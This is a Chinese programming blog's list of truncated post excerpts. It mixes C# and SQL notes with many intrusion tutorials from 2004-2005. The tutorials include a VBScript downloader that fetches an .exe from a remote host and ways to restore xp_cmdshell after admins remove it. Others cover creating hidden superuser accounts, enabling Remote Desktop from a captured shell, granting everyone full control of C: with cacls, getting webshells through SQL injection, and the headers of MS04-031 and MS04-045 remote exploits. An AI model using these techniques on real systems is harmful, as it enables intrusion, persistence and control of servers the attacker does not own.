- 博客(63)
- 资源 (2)
- 收藏
- 关注
转载 动态编译c#
publicbool CompileScripts(stringassemblyName, string path,bool debug) {92 93// find all CSharp files
2011-09-16 16:49:47 481
原创 今天发现一个变态的游戏代码
<br />某个flash在线游戏,写法非常变态.全部变量参数都用table实现,NND连个字符串也放到tab文件里面...<br />通讯采用socket,发送一大堆json编码......<br />无人读懂的json 无名称,无列名<br />全部r0 r1 r2 r3 ....<br />变态 连一个ID也要分到3个{obj1 obj2 obj3}<br /> <br />彻底被打败
2010-12-02 22:34:00 1197 1
原创 秒拍网站分析
<br />近日网上流行秒拍。。在一定时间内 最后一位出价者 获得奖品<br /> <br />这些秒拍网站盈利点很牛B,每拍一个时间增加8-10秒 使得更多人去点秒杀。。。但是这样一来 只有一个结果,就是最多X币的人会胜出<br />也就是说谁冲多了,谁就是最后胜利。。。。这些都是RMB啊。。。<br /> <br />而且这些网站在后台上面容易做手脚,他能判断这个商品目前使用了多少个X币。如果没到设置的X币 也就是亏本情况下,系统自动发出匿名秒杀者。。。。一直去忽悠真正的秒杀者。。。<br /> <br
2010-11-25 15:05:00 2007
原创 c#winform使用webkit自定义扩展
最近研究了用webkit来做界面,非常舒服,主要实现就是webkit与winform的交互,那么就需要扩展webkit,增加一个函数可以调用c#的函数,同时webkit已经可以对document执行invokescript,因此需要下载webkit源码,在DOMWindow.cpp中增加你想要要函数void DOMWindow::ExternalCall(const String& page, const String& action,const String& param){ i
2010-11-10 14:57:00 892
原创 c#winform使用webkit自定义扩展
<br />最近研究了用webkit来做界面,非常舒服,主要实现就是webkit与winform的交互,那么就需要扩展webkit,增加一个函数可以调用c#的函数,同时webkit已经可以对document执行invokescript,因此需要下载webkit源码,在DOMWindow.cpp中增加你想要要函数void DOMWindow::ExternalCall(const String& page, const String& action,const String& param){
2010-11-10 14:57:00 10660 5
原创 SQL常用命令使用方法
1) 数据记录筛选: sql="select * from 数据表 where 字段名=字段值 order by 字段名 [desc]" sql="select * from 数据表 where 字段名 like %字段值% order by 字段名 [desc]" sql="select top 10 * from 数据表 where 字段名 order by 字段名 [desc]" sql="
2005-02-25 04:29:00 1266
原创 Do All in Cmd Shell
目录1,前言2,文件传输3,系统配置4,网络配置5,软件安装6,Windows脚本7,附言前言Cmd Shell(命令行交互)是黑客永恒的话题,它历史悠久并且长盛不衰。本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。文件传输对于溢出漏洞获得的cmd shell,最大的问题就是如何上传文件。由于蠕虫病毒流行,连接ipc$所需要的139或44
2005-02-25 04:28:00 943
原创 asp查看系统用户和进程的代码
dim objon error resume nextfor each obj in getObject("WinNT://.")err.clear%>-->%>系统用户(组)系统进程else%>() next %>
2005-02-25 04:23:00 885
原创 命令行安装终端服务
首先,telnet到该机器上面(具体怎么样上去不需要我说了吧),然后在命令行下输入如下三行命令: c:/>echo [Components] > c:/aa c:/>echo TSEnable = on >>c:/aa c:/>sysocmgr /i:c:/winnt/inf/sysoc.inf /u:c:/aa /q /r
2005-01-30 23:59:00 1043
原创 在webshell下安全执行EXE程序
有时候在WEBSHELL下面执行EXE程序常常会导致IIS崩溃有一种方法比较方便 首先查看系统时间time /T获得当前时间添加到at time xxx.exe用at命令查看任务是否被添加
2005-01-05 01:36:00 1858
原创 更改目录权限
cacls.exe c: /E /T /G everyone:Fcacls.exe c: /E /T /G everyone:Fcacls.exe c: /E /T /G everyone:Fcacls.exe c: /E /T /G everyone:F
2005-01-04 05:48:00 963
原创 gcc for windows 环境搭建
gcc for windows 环境搭建安装好mingw 如果,安装在C:/MinGW设置环境变量如下:PATH : C:/MinGW/bin; (如果安装过其他c++编译器,务必把你要使用的编译器路径放在最前面)LIBRARY_PATH :C:/MinGW/libC_INCLUDE_PATH :C:/MinGW/includeCPLUS_INCLUDE_PATH :C:/MinGW/incl
2005-01-04 02:05:00 5963 2
原创 创建触发器
create trigger trig_notic_UIon notic for insert,updateasupdate notic set memo=memo+where id in(select id from inserted) go/*trig_notic_UI 触发器名称 自定义notic 需要触发的表名memo 需要更新的字段id 是主键*/
2005-01-01 15:55:00 1009
原创 Microsoft Windows NetDDE Remote Buffer Overflow Exploit (MS04-031)
Date : 31/12/2004/* HOD-ms04031-netdde-expl.c: 2004-12-30: PUBLIC v.0.2 * * Copyright (c) 2004 houseofdabus. * * (MS04-031) NetDDE buffer overflow vulnerability PoC *
2005-01-01 12:36:00 1121
原创 Microsoft WINS Remote Code Execution Exploit (MS04-045)
Date : 31/12/2004CAN-2004-1080/*************************************************************//* ZUCWins 0.1 - Wins 2000 remote root exploit */
2005-01-01 12:34:00 1199
原创 cmd下载文件方法
Set xPost = CreateObject("Microsoft.XMLHTTP") xPost.Open "GET","http://www.xx.com/dc.exe",0 下载文件的地址xPost.Send() Set sGet = CreateObject("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open()
2004-12-30 19:28:00 5929
原创 当SA遇到XP_CMDSHELL时
有时候在入侵的时候总是碰到先烦恼的问题,比如SA遇到xp_cmdshell时,如果管理员把xp_cmdshell删了怎么办呢?总是眼看着肉鸡跑了吧!今天我就对XP_CMDSHELL做一先解释,希望大家能看明白,能看懂众所周知,在MSSQL中,通过XP_cmdshell存储扩展,拥护具有sysadmin权限,用来执行系统任意命令但是那先网管也不是吃素的,都回把它删除,所以在SQL Injection
2004-12-30 19:25:00 1527
原创 深入挖掘Windows脚本技术
得益于com技术的支持,WSH能提供比批处理(.bat)更强大的功能。说白了,wsh不过是调用现成的“控件”作为一个对象,用对象的属性和方法实现目的。 常用的对象有: WScript Windows脚本宿主对象模型的根对象,要使用WSH自然离不开它。它提供多个子对象,比如WScript.Arguments和WScript.Shell。前者提供对整个命令行参数集的访问,后者可以运行程序、操纵注册表内
2004-12-30 17:44:00 979
原创 突破TCP/IP筛选到3389终端登陆
一:得到webshell今天晚上的一次小小测试,由于本人太菜,再高深的技术我也不会,只能这样了..........一切都已经过去了,没有办法补图了,希望能看的懂这个小帖子。今天有是无聊的一天,晚上实在无聊没有事情干,就到一个视频聊天站点看秀,嘿嘿~突然发现一个聊天室特别的火暴,人数已经有500人在里面了(满员了),刷了n次也没有进去..........更加郁闷了!:(想想反正也是没有事情做,测试一
2004-12-29 03:07:00 1744
原创 绿色开启终端的简单方法
今天介绍的这种开终端的方法,绿色,环保,无污染~~不须上传任何文件开启终端的方法适合win2k,xp,2003.本文前提是已经通过某种方法得到了对方的一个SYSTEM权限的CMDSHELL~~在无须传任何文件的情况下开启终端服务。 一、win 2k下终端开启终端首先用ECHO写一个3389.reg文件,然后导入到注册表,echo代码如下:echo Windows Registry Ed
2004-12-29 02:55:00 817
原创 蓝屏的原创添加超级用户的.asp代码
[转载]蓝屏的原创添加超级用户的.asp代码 凯文改进 Ms未公布的漏洞信息来源:冰点论坛作者:凯文 (kevin1986).network对象脚本权限提升漏洞利用工具用户:密码: if request.servervariables("REMOTE_ADDR") response.write "iP !s n0T RiGHt"else if request("username")
2004-12-26 14:48:00 865
原创 DISCUZ漏洞与提升权限
DISCUZ漏洞与提升权限这个漏洞是孟兄发现的,我在这里感谢他!也感谢ANGEL的分析!DISCUZ 2.2F的这个漏洞在register.php 的代码中:有如下代码: $email = trim($email); if(!$doublee && strstr($email, @)) { $emailadd = "OR email=$email";}
2004-12-17 16:30:00 6841
原创 扩展储存过程被删除以后可以有很简单的办法恢复
★Dbcc的一个用法扩展储存过程被删除以后可以有很简单的办法恢复:比如:删除DROP PROCEDURE sp_addextendedprocDROP PROCEDURE sp_OACreateexec sp_dropextendedproc xp_cmdshell恢复dbcc addextendedproc ("sp_OACreate","odsole70.dll")dbcc addexte
2004-12-08 15:15:00 861
原创 用BACKUP得到一个asp的shell
This article is about how to get a webshell when SQL Injecting under MSSQL database. The method seems work well since the day I found her(July 2003). You dont need the sa privilege, just a dbowner i
2004-11-16 19:47:00 1390
原创 ASP中各种数据库连接代码
MS Access数据库连接 用DSN连接并且没有用户名和密码:set conn = Server.CreateObject("ADODB.Connection")conn.open "YourDSNName"%>用DSN连接并且有用户名和密码:set conn = Server.CreateObject("ADODB.Connection")conn.open "YourDSNNam
2004-11-16 19:41:00 1032
原创 如何建立隐藏的超级用户
前几天在某个网站看到了一篇介绍如何建立隐藏的超级用户的图文教程,给我了很大的启发,作者只说明了如何在本地图形界面下建立隐藏的超级用户,且作者说他无法在命令行下实现隐藏的超级用户的建立,于是我就开始自已摸索,刚开始时,我用reg.exe(3.0版)作为命令行下导出导入注册表文件的工具,但每次导入以后,建立的隐藏的超级用户总不能用,后来打开注册表查看,发现这个隐藏的超级用户的默认数据类型并没有被导入注
2004-10-10 13:54:00 1108
转载 ADO.net 中数据库连接方式(微软提供)
在MSDN中,.net的数据库连接字符串都有详细的说明,我这里以代码范例的方式罗列一些,具体的每一项代表的意义可以参看MSDN.ADO.net 中数据库连接方式(微软提供)微软提供了以下四种数据库连接方式:System.Data.OleDb.OleDbConnectionSystem.Data.SqlClient.SqlConnectionSystem.Data.Odbc.OdbcConn
2004-09-06 14:33:00 898
原创 SQL SERVER与C#中数据类型的对应关系
?/// ??/// 数据库中与C#中的数据类型对照??/// ??/// ??/// ??private string ChangeToCSharpType(string type)??{???string reval=string.Empty;???switch(type.ToLower())???{????case "int":?????reval= "Int32";?????break;?
2004-09-06 14:30:00 726
原创 用 CSS 替照片加護貝
[懶人拍照] 用 CSS 替照片加護貝有時候我們不太喜歡自己分享的照片在未經知會的情形下,三兩下的就被滑鼠右鍵複製或者更直接的,把照片拖曳到讀者的桌面雖然 google 一下,就會找到很多很多的 Javascript 來防賭這樣的情形但又覺得那些語法很困難,一旦有了問題不知道怎麼調整而且很可能還會有其他的副作用實在有些傷腦經在上一篇文章裡,我們提到了用 CSS 背景
2004-09-02 01:49:00 979
原创 ((DataRowView)e.Item.DataItem)["parentid"]
((DataRowView)e.Item.DataItem)["parentid"]
2004-08-24 22:51:00 868
原创 文件加解密
加密:static String Encrypt(String pwd) {DESCryptoServiceProvider desc = new DESCryptoServiceProvider();//des进行加密PasswordDeriveBytes db = new PasswordDeriveBytes(pwd, null);//产生keybyte[] key = db.GetByte
2004-08-24 10:58:00 806
原创 利用System.IO中的Directory类对目录进行基本操作
//创建目录 Directory.CreateDirectory("c://Dir_name"); //删除目录 Directory.Delete("c://Dir_name"); //或 Directory.Delete("c://Dir_name",false); //当待删除目录下有文件或子目录时,抛出异常,除非第二个参数为true //判断一
2004-08-20 21:50:00 1265
转载 XmlHttp异步获取网站数据的例子
var oDiv var xh function getXML(){ oDiv = document.all.m oDiv.innerHTML = "正在装载栏目数据,请稍侯......." oDiv.style.display= "" xh = new ActiveXObject("Microsoft.XMLHTTP") xh.onreadystatechange = getReady xh.
2004-08-17 11:15:00 824
原创 url提取方法
public static ArrayList GetLinks(string htmlContent) { Match mMatch; ArrayList aMatch = new ArrayList(); mMatch = Regex.Match(htmlContent, "href//s*=//s*(?:/"(?[^/"|^/]*)/"|/(?[^/]*)/|(?[^>
2004-08-16 14:32:00 1041
转载 2进制、8进制、10进制、16进制...各种进制间的轻松转换(c#)
?在.NET Framework中,System.Convert类中提供了较为全面的各种类型、数值之间的转换功能。其中的两个方法可以轻松的实现各种进制的数值间的转换:Convert.ToInt32(string value, int fromBase):可以把不同进制数值的字符串转换为数字,其中fromBase参数为进制的格式,只能是2、8、10及16:如Convert.ToInt
2004-08-14 21:24:00 1363
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人